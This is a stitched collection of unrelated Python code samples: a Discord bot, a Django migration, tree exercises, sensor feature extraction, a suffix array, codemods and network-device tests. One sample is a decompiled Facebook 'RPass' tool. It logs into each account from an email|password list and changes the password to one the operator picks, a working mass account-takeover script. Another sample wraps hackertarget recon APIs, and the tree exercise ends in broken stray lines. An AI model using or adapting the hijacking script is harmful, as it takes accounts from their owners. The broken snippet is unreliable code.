length = f"0:0{min}:{sec}"
else:
if len(str(sec)) == 1:
length = f"0:{min}:0{sec}"
else:
length = f"0:{min}:{sec}"
elif hour > 0:
if len(str(hour)) == 1:
if len(str(min)) == 1:
length = f"0{hour}:0{min}"
else:
length = f"0{hour}:{min}"
else:
length = f"{hour}:{min}"
except:
length = 'N/A'
try:
            time = datetime.datetime.fromtimestamp(info['dateActivated']/1000.0)
started = time.strftime("%m/%d/%Y at %H:%M EST")
except:
started = 'N/A'
try:
game = utils.idtogameconverter(int(info['gameType']))
except:
game = 'N/A'
color=random.randint(1, 16777215)
embed = discord.Embed(title=f"{user}'s {game} booster", color = color)
embed.set_thumbnail(url='https://crafatar.com/renders/head/' + uuid)
embed.add_field(name="Player", value=user)
embed.add_field(name="Game", value=game)
embed.add_field(name="Multiplier", value=multiplier)
embed.add_field(name="Started", value=started)
embed.add_field(name="Duration", value=length)
embed.add_field(name="Time Remaining", value=exp)
embed.set_footer(text='Unofficial Hypixel Discord Bot')
await ctx.send(embed=embed)
@commands.command()
async def status(self, ctx):
color=random.randint(1, 16777215)
data = await hypixel.status()
cmpnts = ''
for component in data['components']:
if component['group_id'] == None:
s = component['status'].split('_')
status = ''
for i in s:
status += f"{i.capitalize()} "
cmpnts += f"{component['name']}: {status}\n"
embed = discord.Embed(title="Hypixel Status", description=cmpnts, color=color)
updat = data['page_status']['page']['updated_at'].split('T')
updatd2 = updat[1].split('.')[0]
try:
current = data["months"][0]["incidents"][0]
timestamp = re.sub(r"<var data-var='date'>|</var>|<var data-var='time'>", "", current["timestamp"])
if 'been resolved' in current['message'].lower() or 'completed' in current['message'].lower():
raise IndexError
embed.add_field(name=f"{current['name']}", value=f"{current['message']}\nImpact: {current['impact'].capitalize()}\nIncident created {timestamp}")
except IndexError:
pass
embed.set_footer(text=f"Unofficial Hypixel Discord Bot - Status updated {updat[0]} at {updatd2}")
await ctx.send(embed=embed)
def setup(bot):
bot.add_cog(ServerStats(bot))
| StarcoderdataPython |
1763850 | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import migrations, models
import django.db.models.deletion
from django.conf import settings
class Migration(migrations.Migration):
dependencies = [
('events', '0001_initial'),
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
]
operations = [
migrations.CreateModel(
name='Activity',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('created_at', models.DateTimeField(help_text='creation date', auto_now_add=True)),
('updated_at', models.DateTimeField(help_text='edition date', auto_now=True, null=True)),
('name', models.CharField(max_length=50, verbose_name='name')),
('description', models.CharField(max_length=1500, verbose_name='description')),
('start_date', models.DateTimeField(verbose_name='start date')),
('end_date', models.DateTimeField(null=True, verbose_name='final date')),
('address', models.CharField(max_length=50, verbose_name='address')),
('quota', models.IntegerField(verbose_name='quota')),
('is_active', models.BooleanField(default=True, verbose_name='is active')),
('event', models.ForeignKey(related_name='events', on_delete=django.db.models.deletion.SET_NULL, verbose_name='event', to='events.Event', null=True)),
('manager', models.ForeignKey(related_name='activities_activity_manager', verbose_name='manager', to=settings.AUTH_USER_MODEL)),
],
options={
'abstract': False,
},
),
]
| StarcoderdataPython |
11116 | # Write a recursive function to count the number of nodes in a Tree. (first do it yourself, then see the code)
def count_nodes(self):
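    # A node contributes 1, plus the recursive counts of its left and right subtrees.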
count = 1
left_count = 0
right_count = 0
if self.left:
left_count = self.left.count_nodes()
if self.right:
right_count = self.right.count_nodes()
return count + left_count + right_count
Q # 2:
'''The height of a tree is the maximum number of levels in the tree. So, a tree with just one node has a height of 1. If the root has children which are leaves, the height of the tree is 2.
The height of a TreeNode can be computed recursively using a simple algorithm: the height of a TreeNode with no children is 1. If it has children, the height is the maximum of the heights of its two sub-trees + 1.
Write a clean, recursive function for the TreeNode class that calculates the height based on the above statement (first do it yourself, then see the code). '''
def get_height(self):
height = 1
left_height = 0
right_height = 0
if self.left:
left_height = self.left.get_height()
if self.right:
right_height = self.right.get_height()
    return height + max(left_height, right_height)
print(self.val)
    if self.left.val > self.val or self.right.val < self.val:
return False
| StarcoderdataPython |
3238852 | <reponame>HSZemi/sensorid-collect<gh_stars>0
#! /usr/bin/env python3
import sys
import argparse
import json
import os
import csv
from features import *
# create a mapping of all known sensor classes to all known sensor names
def classes(directory):
sensors = {}
sensors['TYPE_ACCELEROMETER'] = []
sensors['TYPE_ACCELEROMETER'].append('BMA150 3-axis Accelerometer')
sensors['TYPE_ACCELEROMETER'].append('Invensense Accelerometer')
sensors['TYPE_ACCELEROMETER'].append('Invensense Accelerometer -Wakeup Secondary')
sensors['TYPE_ACCELEROMETER'].append('LGE Accelerometer Sensor')
sensors['TYPE_ACCELEROMETER'].append('MPU-6050 Accelerometer')
sensors['TYPE_ACCELEROMETER'].append('BMI160 accelerometer')
sensors['TYPE_GRAVITY'] = []
sensors['TYPE_GRAVITY'].append('Gravity')
sensors['TYPE_GRAVITY'].append('Gravity Sensor')
sensors['TYPE_GRAVITY'].append('Invensense Gravity')
sensors['TYPE_GRAVITY'].append('Invensense Gravity-Wakeup Secondary')
sensors['TYPE_GYROSCOPE'] = []
sensors['TYPE_GYROSCOPE'].append('Invensense Gyroscope')
sensors['TYPE_GYROSCOPE'].append('Invensense Gyroscope -Wakeup Secondary')
sensors['TYPE_GYROSCOPE'].append('Invensense Gyroscope Uncalibrated')
sensors['TYPE_GYROSCOPE'].append('Invensense Gyroscope Uncalibrated -Wakeup Secondary')
sensors['TYPE_GYROSCOPE'].append('LGE Gyroscope Sensor')
sensors['TYPE_GYROSCOPE'].append('MPU-6050 Gyroscope')
sensors['TYPE_GYROSCOPE'].append('BMI160 gyroscope (uncalibrated)')
sensors['TYPE_GYROSCOPE'].append('BMI160 gyroscope')
sensors['TYPE_LIGHT'] = []
sensors['TYPE_LIGHT'].append('CM3602 Light sensor')
sensors['TYPE_LIGHT'].append('Invensense Light')
sensors['TYPE_LIGHT'].append('Invensense Light -Wakeup Secondary')
sensors['TYPE_LIGHT'].append('LGE Light Sensor')
sensors['TYPE_LINEAR_ACCELERATION'] = []
sensors['TYPE_LINEAR_ACCELERATION'].append('Invensense Linear Acceleration')
sensors['TYPE_LINEAR_ACCELERATION'].append('Invensense Linear Acceleration-Wakeup Secondary')
sensors['TYPE_LINEAR_ACCELERATION'].append('Linear Acceleration')
sensors['TYPE_LINEAR_ACCELERATION'].append('Linear Acceleration Sensor')
sensors['TYPE_MAGNETIC_FIELD'] = []
sensors['TYPE_MAGNETIC_FIELD'].append('AK8973 3-axis Magnetic field sensor')
sensors['TYPE_MAGNETIC_FIELD'].append('ALPS 3-axis Magnetic field sensor')
sensors['TYPE_MAGNETIC_FIELD'].append('Invensense Magnetometer')
sensors['TYPE_MAGNETIC_FIELD'].append('Invensense Magnetometer -Wakeup Secondary')
sensors['TYPE_MAGNETIC_FIELD'].append('Invensense Magnetometer Uncalibrated')
sensors['TYPE_MAGNETIC_FIELD'].append('Invensense Magnetometer Uncalibrated -Wakeup Secondary')
sensors['TYPE_MAGNETIC_FIELD'].append('LGE Magnetometer Sensor')
sensors['TYPE_MAGNETIC_FIELD'].append('BMM150 magnetometer (uncalibrated)')
sensors['TYPE_MAGNETIC_FIELD'].append('BMM150 magnetometer')
sensors['TYPE_ORIENTATION'] = []
sensors['TYPE_ORIENTATION'].append('AK8973 Orientation sensor')
sensors['TYPE_ORIENTATION'].append('Game Rotation Vector')
sensors['TYPE_ORIENTATION'].append('Invensense Orientation')
sensors['TYPE_ORIENTATION'].append('Invensense Orientation-Wakeup Secondary')
sensors['TYPE_ORIENTATION'].append('Orientation')
sensors['TYPE_ORIENTATION'].append('Orientation Sensor')
sensors['TYPE_PRESSURE'] = []
sensors['TYPE_PRESSURE'].append('Invensense Barometer')
sensors['TYPE_PRESSURE'].append('Invensense Barometer -Wakeup Secondary')
sensors['TYPE_PRESSURE'].append('LGE Barometer Sensor')
sensors['TYPE_PRESSURE'].append('BMP280 pressure')
sensors['TYPE_PROXIMITY'] = []
sensors['TYPE_PROXIMITY'].append('CM3602 Proximity sensor')
sensors['TYPE_PROXIMITY'].append('GP2A - Proximity Sensor')
sensors['TYPE_PROXIMITY'].append('Invensense Proximity')
sensors['TYPE_PROXIMITY'].append('Invensense Proximity:Non Wakeup Secondary')
sensors['TYPE_PROXIMITY'].append('LGE Proximity Sensor')
sensors['TYPE_ROTATION_VECTOR'] = []
sensors['TYPE_ROTATION_VECTOR'].append('Game Rotation Vector')
sensors['TYPE_ROTATION_VECTOR'].append('Geomagnetic Rotation Vector')
sensors['TYPE_ROTATION_VECTOR'].append('Invensense Game Rotation Vector')
sensors['TYPE_ROTATION_VECTOR'].append('Invensense Game Rotation Vector-Wakeup Secondary')
sensors['TYPE_ROTATION_VECTOR'].append('Invensense Geomagnetic Rotation Vector')
sensors['TYPE_ROTATION_VECTOR'].append('Invensense Geomagnetic Rotation Vector-Wakeup Secondary')
sensors['TYPE_ROTATION_VECTOR'].append('Invensense Rotation Vector')
sensors['TYPE_ROTATION_VECTOR'].append('Invensense Rotation Vector-Wakeup Secondary')
sensors['TYPE_ROTATION_VECTOR'].append('Rotation Vector')
sensors['TYPE_ROTATION_VECTOR'].append('Rotation Vector Sensor')
sensors['TYPE_UNKNOWN'] = []
sensors['TYPE_UNKNOWN'].append('Device Position Classifier')
sensors['TYPE_UNKNOWN'].append('Invensense Significant Motion Detector')
sensors['TYPE_UNKNOWN'].append('Invensense Step Counter')
sensors['TYPE_UNKNOWN'].append('Invensense Step Counter-Wakeup Secondary')
sensors['TYPE_UNKNOWN'].append('Invensense Step Detector')
sensors['TYPE_UNKNOWN'].append('Invensense Step Detector-Wakeup Secondary')
sensors['TYPE_UNKNOWN'].append('Invensense Tilt')
sensors['TYPE_UNKNOWN'].append('Significant Motion')
with open(os.path.join(directory, 'sensortypes.json'), "w") as f:
print(json.dumps(sensors), file=f)
# read all csv files from directory and put the data in a neatly organized json file
def unify(directory, silent=False):
alldata = {}
for element in os.listdir(directory):
if(os.path.isdir(os.path.join(directory, element))):
if not silent:
print("reading", element)
alldata[element] = []
for f in sorted(os.listdir(os.path.join(directory, element))):
if not silent:
print("opening", f)
with open(os.path.join(directory, element, f), "r") as inp:
csvfile = csv.DictReader(inp, delimiter="\t")
data = []
deviceid = ''
for row in csvfile:
localdict = {}
for key in ('timestamp','x','y','z'):
localdict[key] = float(row[key])
data.append(localdict)
deviceid = row['displayname']
if(len(data) > 0):
ts0 = data[0]['timestamp']
for localdict in data:
localdict['timestamp'] -= ts0
alldata[element].append({'deviceid':deviceid, 'data':data})
with open(os.path.join(directory, "measurements.json"), "w") as f:
json.dump(alldata, f)
# take the data from the neatly organized measurements.json and sensortypes.json files,
# calculate the feature vectors and store them in normalizeddata.json,
# store the number of data points alongside the sensor names in enhancedsensors.json.
def extract(directory):
alldata = {}
sensortypes = {}
with open(os.path.join(directory, "measurements.json"), "r") as f:
alldata = json.load(f)
with open(os.path.join(directory, "sensortypes.json"), "r") as f:
sensortypes = json.load(f)
normalizeddata = {}
to_delete = []
for sensortype in sensortypes:
normalizeddata[sensortype] = {'data':[],'target_sensor_name':[], 'target_device_id':[]}
newsensorlist = {}
for sensorname in sensortypes[sensortype]:
totalcount = 0
if(sensorname in alldata):
for measurement in alldata[sensorname]:
meann = {}
minn = {}
maxx = {}
stddevv = {}
avgdevv = {}
skewnesss = {}
kurtosiss = {}
rmsamplitudee = {}
# calculate the features for each dimension, using the methods from features.py
for index in ('x','y','z'):
meann[index] = mean(measurement['data'], index)
minn[index] = lowest(measurement['data'], index)
maxx[index] = highest(measurement['data'], index)
stddevv[index] = stddev(measurement['data'], index, meann[index])
avgdevv[index] = avgdev(measurement['data'], index, meann[index])
skewnesss[index] = skewness(measurement['data'], index, meann[index], stddevv[index])
kurtosiss[index] = kurtosis(measurement['data'], index, meann[index], stddevv[index])
rmsamplitudee[index] = rmsamplitude(measurement['data'], index,)
normalizeddata[sensortype]['data'].append([len(measurement['data']), meann['x'], meann['y'], meann['z'], minn['x'], minn['y'], minn['z'], maxx['x'], maxx['y'], maxx['z'], stddevv['x'], stddevv['y'], stddevv['z'], avgdevv['x'], avgdevv['y'], avgdevv['z'], skewnesss['x'], skewnesss['y'], skewnesss['z'], kurtosiss['x'], kurtosiss['y'], kurtosiss['z'], rmsamplitudee['x'], rmsamplitudee['y'], rmsamplitudee['z'] ])
normalizeddata[sensortype]['target_sensor_name'].append(sensorname)
normalizeddata[sensortype]['target_device_id'].append(measurement['deviceid'])
totalcount += len(measurement['data'])
newsensorlist[sensorname] = totalcount
else:
to_delete.append(sensorname)
sensortypes[sensortype] = newsensorlist
with open(os.path.join(directory, "enhancedsensors.json"), "w") as f:
json.dump(sensortypes, f)
with open(os.path.join(directory, "normalizeddata.json"), "w") as f:
json.dump(normalizeddata, f)
def main():
parser = argparse.ArgumentParser(prog='processData')
parser.add_argument('-c', '--classes', help='create sensor classes metafile', action='store_true')
parser.add_argument('-u', '--unify', help='bring it into a nice format', action='store_true')
parser.add_argument('-x', '--extract', help='extract feature matrix', action='store_true')
parser.add_argument('-a', '--all', help='combination of classes, unify and extract', action='store_true')
parser.add_argument('-s', '--silent', help='suppress output', action='store_true')
parser.add_argument('target', help='target directory')
args = parser.parse_args()
silent = args.silent
if(not os.path.isdir(args.target)):
print("Error: Target '{}' does not exist".format(args.target))
sys.exit()
if(args.classes):
classes(args.target)
if(args.unify):
if not os.path.isfile(os.path.join(args.target, 'sensortypes.json')):
classes(args.target)
unify(args.target, silent)
if(args.extract):
if not os.path.isfile(os.path.join(args.target, 'sensortypes.json')):
classes(args.target)
if not os.path.isfile(os.path.join(args.target, 'measurements.json')):
unify(args.target, silent)
extract(args.target)
if(args.all):
classes(args.target)
unify(args.target, silent)
extract(args.target)
if __name__ == "__main__":
main() | StarcoderdataPython |
84427 | <gh_stars>1-10
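# Trial division: a composite number has a divisor d with d * d <= num,
# so testing candidates up to the square root is sufficient.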
def is_prime(num):
if num <= 1:
return False
d = 2
while d * d <= num and num % d != 0:
d += 1
return d * d > num | StarcoderdataPython |
3393415 | # uncompyle6 version 3.6.2
# Python bytecode 2.7
# Decompiled from: Python 2.7.17 (default, Oct 23 2019, 08:25:46)
# [GCC 4.2.1 Compatible Android (5220042 based on r346389c) Clang 8.0.7 (https://
# Embedded file name: <r>
try:
import os, sys, time
from multiprocessing.pool import ThreadPool
import mechanize
except ImportError:
print '\x1b[37m[\x1b[31mModuleError\x1b[37m] \x1b[34m mechanize not installed'
sys.exit()
class reset:
def __init__(self):
self.u = 'https://mbasic.facebook.com/{}'
self.banner()
def banner(self):
print '\x1b[37m\n ____ ____\n / __ \\/ __ \\____ ___________ \x1b[34mAuthor : \x1b[32mBL4CK DR460N\x1b[37m\n / /_/ / /_/ / __ `/ ___/ ___/ \x1b[34mName Tool : \x1b[32mRPass (Riset Password)\x1b[37m\n / _, _/ ____/ /_/ (__ |__ ) \x1b[34mMy Team : \x1b[32mWoll Cyber Team\x1b[37m\n/_/ |_/_/ \\__,_/____/____/\n\n'
self.main()
def main(self):
print '\x1b[37m[*] sparator (email|password)'
try:
list = raw_input('\x1b[37m[?] List Account : \x1b[32m')
self.file = open(list, 'r').read().splitlines()
except IOError:
print '\x1b[31m[*] File not found'
sys.exit()
print '\x1b[37m[!] Password must be 6 characters or more'
self.newpas = raw_input('\x1b[37m[?] New Password : \x1b[32m')
if self.newpas < 6:
print '\x1b[37m[!] Password must be 6 characters or more'
sys.exit()
for i in self.file:
self.login(i)
print '\x1b[32m[+] DONE, file save as : \x1b[34mout/new.txt'
def login(self, id):
global br
try:
br = mechanize.Browser()
br.set_handle_equiv(True)
br.set_handle_gzip(True)
br.set_handle_redirect(True)
br.set_handle_referer(True)
br.set_handle_robots(False)
br.set_handle_refresh(mechanize._http.HTTPRefreshProcessor(), max_time=1)
br.addheaders = [('User-Agent', 'Mozilla/5.0 (Linux; Android 4.4.2; Nexus 4 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.114 Mobile Safari/537.36')]
br.open(self.u.format('/login'))
br.select_form(nr=0)
br.form['email'] = id.split('|')[0]
br.form['pass'] = id.split('|')[1]
sub = br.submit().read()
if 'save-device' in str(sub) or 'm_sess' in str(sub):
self.set(id)
else:
print ('\x1b[31m[FL] {}').format(id)
except:
pass
def set(self, id):
br.open(self.u.format('/settings/security/password/'))
br._factory.is_html = True
br.select_form(nr=1)
br.form['password_old'] = id.split('|')[1]
br.form['password_new'] = self.newpas
br.form['password_confirm'] = self.newpas
mit = br.submit().read()
if 'Kata Sandi Telah Diubah' in str(mit) or 'Password Changed' in str(mit):
try:
os.mkdir('out')
except:
pass
with open('out/new.txt', 'a') as (sv):
sv.write('{}|{}\n').format(id.split('|')[0], self.newpas)
print ('\x1b[37m[\x1b[32mOK\x1b[37m] \x1b[32mSUCCESS To Riset \x1b[34m{} \x1b[37m>> \x1b[32m{}|{}').format(self.id, id.split('|')[0], self.newpas)
reset() | StarcoderdataPython |
1602171 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
import requests
def hackertarget_api(choice, target):
request_urls = [
"https://api.hackertarget.com/mtr/?q=",
"https://api.hackertarget.com/nping/?q=",
"https://api.hackertarget.com/dnslookup/?q=",
"https://api.hackertarget.com/reversedns/?q=",
"https://api.hackertarget.com/hostsearch/?q=",
"https://api.hackertarget.com/findshareddns/?q=",
"https://api.hackertarget.com/zonetransfer/?q=",
"https://api.hackertarget.com/whois/?q=",
"https://api.hackertarget.com/geoip/?q=",
"https://api.hackertarget.com/reverseiplookup/?q=",
"https://api.hackertarget.com/nmap/?q=",
"https://api.hackertarget.com/subnetcalc/?q=",
"https://api.hackertarget.com/httpheaders/?q=",
"https://api.hackertarget.com/pagelinks/?q=",
]
request_url = request_urls[choice-1]
url = request_url + target
request = requests.get(url)
return request.text
| StarcoderdataPython |
1752848 | # python3
import sys
def sortcharecters(text):
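    # Counting sort of suffix start positions, keyed by their first character.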
count = [0] * 255
order = [None] * len(text)
for c in text:
count[ord(c)] += 1
for i in range(255):
count[i] += count[i - 1]
for i in range(len(text)-1,-1,-1):
count[ord(text[i])] -= 1
order[count[ord(text[i])]] = i
return order
def singleclass(order, text):
clas = [None] * len(text)
clas[order[0]] = 0
for i in range(1, len(text)):
if text[order[i]] != text[order[i - 1]]:
clas[order[i]] = clas[order[i-1]] + 1
else:
clas[order[i]] = clas[order[i-1]]
return clas
def doubleorder(L, text, order, clas):
n = len(text)
count = [0] * n
neworder = [None] * n
for i in range(0, n):
count[clas[i]] += 1
for i in range(1, n):
count[i] += count[i - 1]
for i in range(n - 1, -1, -1):
start = (order[i] - L + n) % n
count[clas[start]] -= 1
neworder[count[clas[start]]] = start
return neworder
def updateclass(L, order, clas):
n = len(clas)
newclass = [None] * n
newclass[order[0]] = 0
for i in range(1, n):
cur, prev = order[i], order[i - 1]
mid, midprev = (cur + L) % n, (prev + L) % n
if clas[cur] != clas[prev] or clas[mid] != clas[midprev]:
newclass[cur] = newclass[prev] + 1
else:
newclass[cur] = newclass[prev]
return newclass
def build_suffix_array(text):
"""
Build suffix array of the string text and
return a list result of the same length as the text
such that the value result[i] is the index (0-based)
in text where the i-th lexicographically smallest
suffix of text starts.
"""
    # Prefix-doubling construction: start from an ordering by single characters,
    # then repeatedly sort cyclic substrings of length 2L (using the equivalence
    # classes of length-L substrings), doubling L until it covers the whole text.
order = sortcharecters(text)
clas = singleclass(order, text)
L = 1
while L < len(text):
order = doubleorder(L, text, order, clas)
clas = updateclass(L, order, clas)
L *= 2
return order
if __name__ == '__main__':
text = sys.stdin.readline().strip()
print(" ".join(map(str, build_suffix_array(text))))
| StarcoderdataPython |
95830 | <filename>Data Structure/Matrix/Addition of Two Matrices/SolutionByRiya.py
rows= int(input("Enter the number of rows: "))
cols= int(input("Enter the number of columns: "))
matrixA=[]
print("Enter the entries rowwise for matrix A: ")
for i in range(rows):
a=[]
for j in range(cols):
a.append(int(input()))
matrixA.append(a)
matrixB=[]
print("Enter the entries rowwise for matrix B: ")
for i in range(rows):
b=[]
for j in range(cols):
b.append(int(input()))
matrixB.append(b)
matrixResultant=[[0 for j in range(cols)] for i in range(rows)]
for i in range(rows):
for j in range(cols):
matrixResultant[i][j]=matrixA[i][j]+matrixB[i][j]
for r in matrixResultant:
print (r)
| StarcoderdataPython |
1716388 | from libcst import BaseExpression, Call
from libcst import matchers as m
from django_codemod.constants import DJANGO_2_0, DJANGO_3_0, DJANGO_4_0
from django_codemod.visitors.base import (
BaseDjCodemodTransformer,
BaseFuncRenameTransformer,
)
class HttpUrlQuoteTransformer(BaseFuncRenameTransformer):
"""Replace `django.utils.http.urlquote` by `urllib.parse.quote`."""
deprecated_in = DJANGO_3_0
removed_in = DJANGO_4_0
rename_from = "django.utils.http.urlquote"
rename_to = "urllib.parse.quote"
class HttpUrlQuotePlusTransformer(BaseFuncRenameTransformer):
"""Replace `django.utils.http.urlquote_plus` by `urllib.parse.quote_plus`."""
deprecated_in = DJANGO_3_0
removed_in = DJANGO_4_0
rename_from = "django.utils.http.urlquote_plus"
rename_to = "urllib.parse.quote_plus"
class HttpUrlUnQuoteTransformer(BaseFuncRenameTransformer):
"""Replace `django.utils.http.urlunquote` by `urllib.parse.unquote`."""
deprecated_in = DJANGO_3_0
removed_in = DJANGO_4_0
rename_from = "django.utils.http.urlunquote"
rename_to = "urllib.parse.unquote"
class HttpUrlUnQuotePlusTransformer(BaseFuncRenameTransformer):
"""Replace `django.utils.http.urlunquote_plus` by `urllib.parse.unquote_plus`."""
deprecated_in = DJANGO_3_0
removed_in = DJANGO_4_0
rename_from = "django.utils.http.urlunquote_plus"
rename_to = "urllib.parse.unquote_plus"
class IsSafeUrlTransformer(BaseFuncRenameTransformer):
"""Rename `django.utils.http.is_safe_url` to `url_has_allowed_host_and_scheme`."""
deprecated_in = DJANGO_3_0
removed_in = DJANGO_4_0
rename_from = "django.utils.http.is_safe_url"
rename_to = "django.utils.http.url_has_allowed_host_and_scheme"
class HttpRequestXReadLinesTransformer(BaseDjCodemodTransformer):
"""Replace `HttpRequest.xreadlines()` by iterating over the request."""
deprecated_in = DJANGO_2_0
removed_in = DJANGO_3_0
# This should be conservative and only apply changes to:
# - variables called `request`/`req`
# - `request`/`req` attributes (e.g `self.request`/`view.req`...)
matcher = m.Call(
func=m.Attribute(
value=m.OneOf(
m.Name(value="request"),
m.Name(value="req"),
m.Attribute(attr=m.Name(value="request")),
m.Attribute(attr=m.Name(value="req")),
),
attr=m.Name(value="xreadlines"),
)
)
def leave_Call(self, original_node: Call, updated_node: Call) -> BaseExpression:
if m.matches(updated_node, self.matcher):
return updated_node.func.value
return super().leave_Call(original_node, updated_node)
| StarcoderdataPython |
1642324 | <filename>src/unicon/plugins/tests/test_plugin_iosxe_quad.py
"""
Unittests for IOSXE/Quad plugin
"""
import unittest
from unittest.mock import patch
from pyats.topology import loader
import unicon
from unicon import Connection
from unicon.plugins.tests.mock.mock_device_iosxe import MockDeviceTcpWrapperIOSXE
@patch.object(unicon.settings.Settings, 'POST_DISCONNECT_WAIT_SEC', 0)
@patch.object(unicon.settings.Settings, 'GRACEFUL_DISCONNECT_WAIT_SEC', 0)
class TestIosXEQuadConnect(unittest.TestCase):
def test_quad_connect(self):
md = MockDeviceTcpWrapperIOSXE(port=0,
quad=True,
state='quad_login,quad_ics_login,quad_stby_login,quad_ics_login')
md.start()
d = Connection(hostname='Router',
start=['telnet 127.0.0.1 ' + str(i) for i in md.ports[:]],
os='iosxe',
chassis_type='quad',
username='cisco',
tacacs_password='<PASSWORD>',
enable_password='<PASSWORD>')
d.connect()
self.assertTrue(d.active.alias == 'a')
d.disconnect()
md.stop()
def test_quad_connect2(self):
d = Connection(hostname='Router',
start=['mock_device_cli --os iosxe --state quad_login',
'mock_device_cli --os iosxe --state quad_ics_login',
'mock_device_cli --os iosxe --state quad_stby_login',
'mock_device_cli --os iosxe --state quad_ics_login'],
os='iosxe',
chassis_type='quad',
username='cisco',
tacacs_password='<PASSWORD>',
enable_password='<PASSWORD>')
d.connect()
d.execute('term width 0')
self.assertEqual(d.spawn.match.match_output, 'term width 0\r\nRouter#')
d.disconnect()
def test_quad_connect3(self):
md = MockDeviceTcpWrapperIOSXE(port=0,
quad=True,
state='quad_login,quad_ics_login,quad_stby_login,quad_ics_login')
md.start()
testbed = '''
devices:
Router:
type: router
os: iosxe
chassis_type: quad
credentials:
default:
password: <PASSWORD>
username: cisco
enable:
password: <PASSWORD>
username: cisco
connections:
defaults:
class: 'unicon.Unicon'
connections: [a, b, c, d]
a:
protocol: telnet
ip: 127.0.0.1
port: {}
member: 1
b:
protocol: telnet
ip: 127.0.0.1
port: {}
member: 1
c:
protocol: telnet
ip: 127.0.0.1
port: {}
member: 2
d:
protocol: telnet
ip: 127.0.0.1
port: {}
member: 2
'''.format(md.ports[0], md.ports[1], md.ports[2], md.ports[3])
t = loader.load(testbed)
d = t.devices.Router
d.connect()
self.assertTrue(d.active.alias == 'a')
d.execute('term width 0')
d.configure('no logging console')
d.disconnect()
md.stop()
class TestIosXEQuadDisableEnable(unittest.TestCase):
def test_disable_enable(self):
d = Connection(hostname='Router',
start=['mock_device_cli --os iosxe --state quad_login',
'mock_device_cli --os iosxe --state quad_ics_login',
'mock_device_cli --os iosxe --state quad_stby_login',
'mock_device_cli --os iosxe --state quad_ics_login'],
os='iosxe',
chassis_type='quad',
username='cisco',
tacacs_password='<PASSWORD>',
enable_password='<PASSWORD>')
d.connect()
d.disable()
self.assertEqual(d.spawn.match.match_output, 'disable\r\nRouter>')
d.enable()
self.assertEqual(d.spawn.match.match_output, 'cisco\r\nRouter#')
d.disable(target='standby')
self.assertEqual(d.standby.spawn.match.match_output, 'disable\r\nRouter-stby>')
d.enable(target='standby')
self.assertEqual(d.standby.spawn.match.match_output, 'cisco\r\nRouter-stby#')
d.disconnect()
class TestIosXEQuadGetRPState(unittest.TestCase):
def test_get_rp_state(self):
d = Connection(hostname='Router',
start=['mock_device_cli --os iosxe --state quad_login',
'mock_device_cli --os iosxe --state quad_ics_login',
'mock_device_cli --os iosxe --state quad_stby_login',
'mock_device_cli --os iosxe --state quad_ics_login'],
os='iosxe',
chassis_type='quad',
username='cisco',
tacacs_password='<PASSWORD>',
enable_password='<PASSWORD>')
d.connect()
r = d.get_rp_state(target='active')
self.assertEqual(r, 'ACTIVE')
r = d.get_rp_state(target='standby')
self.assertEqual(r, 'STANDBY')
r = d.get_rp_state(target='b')
self.assertEqual(r, 'IN_CHASSIS_STANDBY')
d.disconnect()
@patch.object(unicon.settings.Settings, 'POST_DISCONNECT_WAIT_SEC', 0)
@patch.object(unicon.settings.Settings, 'GRACEFUL_DISCONNECT_WAIT_SEC', 0)
class TestIosXEQuadSwitchover(unittest.TestCase):
@classmethod
def setUpClass(cls):
cls.md = MockDeviceTcpWrapperIOSXE(port=0,
quad=True,
state='quad_login,quad_ics_login,quad_stby_login,quad_ics_login')
cls.md.start()
cls.d = Connection(hostname='Router',
start=['telnet 127.0.0.1 ' + str(i) for i in cls.md.ports[:]],
os='iosxe',
chassis_type='quad',
username='cisco',
tacacs_password='<PASSWORD>',
enable_password='<PASSWORD>')
cls.d.connect()
@classmethod
def tearDownClass(cls):
cls.d.disconnect()
cls.md.stop()
def test_reload(self):
self.d.switchover()
@patch.object(unicon.settings.Settings, 'POST_DISCONNECT_WAIT_SEC', 0)
@patch.object(unicon.settings.Settings, 'GRACEFUL_DISCONNECT_WAIT_SEC', 0)
class TestIosXEQuadReload(unittest.TestCase):
@classmethod
def setUpClass(cls):
cls.md = MockDeviceTcpWrapperIOSXE(port=0,
quad=True,
state='quad_login,quad_ics_login,quad_stby_login,quad_ics_login')
cls.md.start()
cls.d = Connection(hostname='Router',
start=['telnet 127.0.0.1 ' + str(i) for i in cls.md.ports[:]],
os='iosxe',
chassis_type='quad',
username='cisco',
tacacs_password='<PASSWORD>',
enable_password='<PASSWORD>')
cls.d.connect()
@classmethod
def tearDownClass(cls):
cls.d.disconnect()
cls.md.stop()
def test_reload(self):
self.d.reload()
if __name__ == "__main__":
unittest.main()
| StarcoderdataPython |
105244 | <filename>scripts/viz_example.py
"""
Visualize which images have low and high confidence scores in the training set.
"""
import os
import torch
import numpy as np
from tqdm import tqdm
from copy import deepcopy
from dotmap import DotMap
from src.utils import utils
from torchvision import transforms
from torch.utils.data import DataLoader
from src.systems.simclr import SimCLRSystem, TaU_SimCLRSystem
from src.systems.mocov2 import MoCoV2System, TaU_MoCoV2System
from src.systems.transfer import TransferSystem, Pretrained_TaU_SimCLRSystem
from torchvision.utils import save_image, make_grid
from src.datasets.utils import DICT_ROOT
from src.datasets.cifar10 import CIFAR10
from src.datasets.cifar100 import CIFAR100
from src.datasets.imagenet import ImageNet
from src.datasets.transforms import get_transforms
from src.datasets.transforms import IMAGE_SHAPE, CROP_SHAPE
@torch.no_grad()
def viz(exp_dir, checkpoint_name, dataset, gpu_device=-1):
config_path = os.path.join(exp_dir, 'config.json')
config_json = utils.load_json(config_path)
config = DotMap(config_json)
config.dataset.name = dataset
if gpu_device >= 0:
config.gpu_device = gpu_device
config.cuda = True
device = torch.device(f'cuda:{gpu_device}')
else:
config.cuda = False
device = torch.device('cpu')
SystemClass = globals()[config.system]
system = SystemClass(config)
checkpoint_file = os.path.join(exp_dir, 'checkpoints', checkpoint_name)
checkpoint = torch.load(checkpoint_file, map_location='cpu')
system.load_state_dict(checkpoint['state_dict'])
system.config = config
system = system.eval()
system = system.to(device)
norms = []
labels = []
with torch.no_grad():
val_loader = DataLoader(system._val_dataset, batch_size=128, shuffle=False, num_workers=8)
pbar = tqdm(total=len(val_loader))
for batch in val_loader:
image, label = batch[1], batch[-1]
image = image.to(device)
mean, score = system.forward(image)
